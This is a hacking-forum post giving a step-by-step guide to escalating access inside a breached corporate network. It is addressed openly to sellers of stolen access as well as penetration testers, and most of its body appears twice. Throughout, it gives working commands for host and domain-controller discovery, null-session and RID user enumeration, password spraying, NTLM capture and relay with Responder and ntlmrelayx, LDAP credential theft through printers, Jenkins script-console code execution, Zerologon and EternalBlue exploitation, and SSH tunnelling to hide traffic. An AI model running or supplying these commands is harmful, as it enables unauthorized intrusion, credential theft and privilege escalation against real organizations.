07-08-25, 05:50 AM
This article is a professional and comprehensive guide for hackers and penetration testers who have recently gained access to an organizational network via VPN or other methods and aim to escalate privileges or extract valuable information (e.g., high-privilege accounts or shells). Focusing on advanced techniques and modern methods, this guide helps you make the most of your initial access and avoid wasting penetration opportunities.
This guide targets two main audiences:
Log and access sellers: To increase the value of their access by obtaining high-privilege accounts.
[*]Beginner and professional penetration testers: To learn or enhance techniques for penetrating organizational networks.
Article Structure
The guide is divided into four main sections:
Advanced Scanning & Enumeration
Targeted Password Spraying & Brute-Forcing
Web Services & Network Devices Exploitation
Exploiting Known Vulnerabilities
1. Advanced Scanning & Enumeration
Objective:
The first step after gaining network access is to thoroughly identify the network infrastructure, active devices, communication paths, and available services. This stage is foundational for all subsequent actions.
Recommended Tools:
Nmap: For network scanning and identifying hosts and services.
Masscan: For rapid scanning in large networks.
[*]Responder: For intercepting and extracting information from network protocols.
[*]CrackMapExec (CME): An advanced alternative to NetExec for interacting with SMB, Kerberos, and LDAP protocols.
Steps:
1. Identify Network Routes:
To map network routes, use the following commands:
In Windows:
[*]In Linux:
[*]
To quickly scan for active hosts in an IP range:
[*]
[*]3. Scan Services and Versions:
After identifying active hosts, detect running services and their versions:
[*]
[*]
Domain controllers typically have ports 88 (Kerberos), 389 (LDAP), and 445 (SMB) open. For quick identification:
[*]Or with CrackMapExec:
[*]2. Targeted Password Spraying & Brute-Forcing
Objective:
Collect valid user accounts and test passwords to access more sensitive resources, such as local or domain admin accounts.
Recommended Tools:
1. Username Enumeration:
Or with an Nmap script:
2. RID Brute-Forcing:
If Null Session is disabled, use RID brute-forcing to extract users:
Or with Enum4linux-ng:
3. Password Spraying:
Using a list of users and common passwords (e.g., Password123, Summer2025):
[*]--continue-on-success: Continues testing even after a successful login.
[*]Tip: Check password policies (Lockout Threshold) to avoid account lockouts:
4. Search AD Group Information:
Admins sometimes store passwords or sensitive information in user account descriptions:
3. Web Services & Network Devices Exploitation
Objective:
Leverage web services, printers, and network devices (e.g., routers, IoT) to extract sensitive information or gain higher access.
Recommended Tools:
Burp Suite: For analyzing web traffic.
[*]Metasploit: For exploiting web and network vulnerabilities.
[*]Nmap Scripts: For scanning specific devices.
Steps:
1. Printer Exploitation: Printers often have web interfaces with default credentials (e.g., admin:admin). Steps:
In printer settings, set your IP as the LDAP server and capture port 389 traffic:
2. Web Services Testing:
Many organizations use web services like Jenkins, Apache Tomcat, or SharePoint. To identify:
If Jenkins is found, use ready-made scripts for code execution:
[*]
4. Exploiting Known Vulnerabilities
Objective:
Use known vulnerabilities in network services and software to gain full access or shells.
Recommended Tools:
Metasploit: For running pre-built exploits.
[*]Exploit-DB / Sploitus: For searching new exploits.
[*]Vulners / Shodan: For identifying vulnerable versions.
Common Vulnerabilities:
1. Zerologon (CVE-2020-1472): Resets domain controller passwords.
2. MS17-010 (EternalBlue): Remote code execution on Windows systems.
SMBGhost (CVE-2020-0796): Exploits SMBv3.
BlueKeep (CVE-2019-0708): Targets older RDP systems.
Exploit Search:
To find exploits for identified services and versions:
Use Google with the format:
Or use databases like:
Sploitus
[*]Vulners
[*]Exploit-DB
Advanced Tips and Recommendations
1. Avoid Account Lockouts:
3. Stealth:
Avoid high-speed scans (e.g., Masscan) in sensitive networks.
Use proxies or SSH tunnels to hide your traffic:
4.Storage and Documentation:
Save all outputs in organized files.
Use project management tools like CherryTree or Dradis for documentation.
This guide targets two main audiences:
Log and access sellers: To increase the value of their access by obtaining high-privilege accounts.
[*]Beginner and professional penetration testers: To learn or enhance techniques for penetrating organizational networks.
Article Structure
The guide is divided into four main sections:
Advanced Scanning & Enumeration
Targeted Password Spraying & Brute-Forcing
Web Services & Network Devices Exploitation
Exploiting Known Vulnerabilities
1. Advanced Scanning & Enumeration
Objective:
The first step after gaining network access is to thoroughly identify the network infrastructure, active devices, communication paths, and available services. This stage is foundational for all subsequent actions.
Recommended Tools:
Nmap: For network scanning and identifying hosts and services.
Masscan: For rapid scanning in large networks.
[*]Responder: For intercepting and extracting information from network protocols.
[*]CrackMapExec (CME): An advanced alternative to NetExec for interacting with SMB, Kerberos, and LDAP protocols.
Steps:
1. Identify Network Routes:
To map network routes, use the following commands:
In Windows:
Code:
route print[*]In Linux:
Code:
ip route show | grep -E 'via|default' | awk '{print $1, $3}'- This command neatly displays network routes related to VPN or other interfaces.
To quickly scan for active hosts in an IP range:
Code:
sudo nmap -sn -n -T4 --min-rate 1000 10.10.0.0/16 -oG active_hosts.txt[*]
- -sn: Ping scan only (no port scanning).
- -n: No DNS resolution for faster scanning.
- --min-rate 1000: Increases scanning speed.
- Output is saved to active_hosts.txt.
Code:
grep "Up" active_hosts.txt | awk '{print $2}' > targets.txt[*]3. Scan Services and Versions:
After identifying active hosts, detect running services and their versions:
[*]
Code:
sudo nmap -sV -p- -T4 -iL targets.txt -oX services.xml[*]
- -sV: Identify service versions.
- -p-: Scan all ports.
- -oX: Save output in XML format for further processing.
Domain controllers typically have ports 88 (Kerberos), 389 (LDAP), and 445 (SMB) open. For quick identification:
[*]
Code:
nmap -p88,389,445 10.10.0.0/16 --open -oG dc_scan.txt[*]
Code:
cme smb 10.10.0.0/16 --gen-relay-list dc_targets.txtObjective:
Collect valid user accounts and test passwords to access more sensitive resources, such as local or domain admin accounts.
Recommended Tools:
- CrackMapExec (CME): For password spraying and extracting information from SMB and Kerberos.
- Kerbrute: For brute-forcing and identifying Kerberos accounts.
- Enum4linux-ng: An improved version of Enum4linux for extracting SMB information.
1. Username Enumeration:
- Use Null Session to extract users without credentials:
cme smb 10.10.0.10 -u "" -p "" --users > users.txt
Or with an Nmap script:
Code:
nmap --script smb-enum-users -p445 10.10.0.10 -oN users_nmap.txtIf Null Session is disabled, use RID brute-forcing to extract users:
Code:
cme smb 10.10.0.10 -u "" -p "" --rid-brute 500-10000 > rid_users.txtCode:
enum4linux-ng -R 10.10.0.10 -o users_enum.txtUsing a list of users and common passwords (e.g., Password123, Summer2025):
Code:
cme smb 10.10.0.0/24 -u users.txt -p passwords.txt --continue-on-success[*]Tip: Check password policies (Lockout Threshold) to avoid account lockouts:
Code:
cme smb 10.10.0.10 -u "" -p "" --pass-polAdmins sometimes store passwords or sensitive information in user account descriptions:
Code:
cme smb 10.10.0.10 -u "" -p "" --users | grep -i "password\|admin"3. Web Services & Network Devices Exploitation
Objective:
Leverage web services, printers, and network devices (e.g., routers, IoT) to extract sensitive information or gain higher access.
Recommended Tools:
Burp Suite: For analyzing web traffic.
[*]Metasploit: For exploiting web and network vulnerabilities.
[*]Nmap Scripts: For scanning specific devices.
Steps:
1. Printer Exploitation: Printers often have web interfaces with default credentials (e.g., admin:admin). Steps:
- Access the printer’s web interface (usually port 80 or 443).
- Check "Address Book" or "Network Settings" for user information.
- Use tools like Responder to capture SMB or LDAP credentials:
sudo responder -I eth0
In printer settings, set your IP as the LDAP server and capture port 389 traffic:
Code:
sudo tcpdump -i eth0 port 389 -w ldap_creds.pcapMany organizations use web services like Jenkins, Apache Tomcat, or SharePoint. To identify:
Code:
nmap --script http-enum -p80,443 10.10.0.0/16 -oN web_services.txtIf Jenkins is found, use ready-made scripts for code execution:
Code:
curl -X POST -H "Jenkins-Crumb: <crumb>" "http://10.10.0.10:8080/script" --data 'script=<your_payload>'- Search for default credentials or known vulnerabilities in databases like Exploit-DB.
Code:
routersploitObjective:
Use known vulnerabilities in network services and software to gain full access or shells.
Recommended Tools:
Metasploit: For running pre-built exploits.
[*]Exploit-DB / Sploitus: For searching new exploits.
[*]Vulners / Shodan: For identifying vulnerable versions.
Common Vulnerabilities:
1. Zerologon (CVE-2020-1472): Resets domain controller passwords.
Code:
cme smb 10.10.0.10 --zerologon2. MS17-010 (EternalBlue): Remote code execution on Windows systems.
Code:
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 10.10.0.10; run"SMBGhost (CVE-2020-0796): Exploits SMBv3.
BlueKeep (CVE-2019-0708): Targets older RDP systems.
Exploit Search:
To find exploits for identified services and versions:
Use Google with the format:
Code:
<service> <version> exploit site:exploit-db.comOr use databases like:
Sploitus
[*]Vulners
[*]Exploit-DB
Advanced Tips and Recommendations
1. Avoid Account Lockouts:
- Check Account Lockout Policies before password spraying.
- Use CME to test policies:
cme smb 10.10.0.10 --pass-polRelay Attacks:Use Responder to capture NTLM Hashes: sudo responder -I eth0 --wpad
Code:
ntlmrelayx.py -tf targets.txt -smb2supportAvoid high-speed scans (e.g., Masscan) in sensitive networks.
Use proxies or SSH tunnels to hide your traffic:
Code:
ssh -D 9050 user@your_serverSave all outputs in organized files.
Use project management tools like CherryTree or Dradis for documentation.
![[Image: SPWrt0B.gif]](https://i.postimg.cc/T2bshTKV/SPWrt0B.gif)
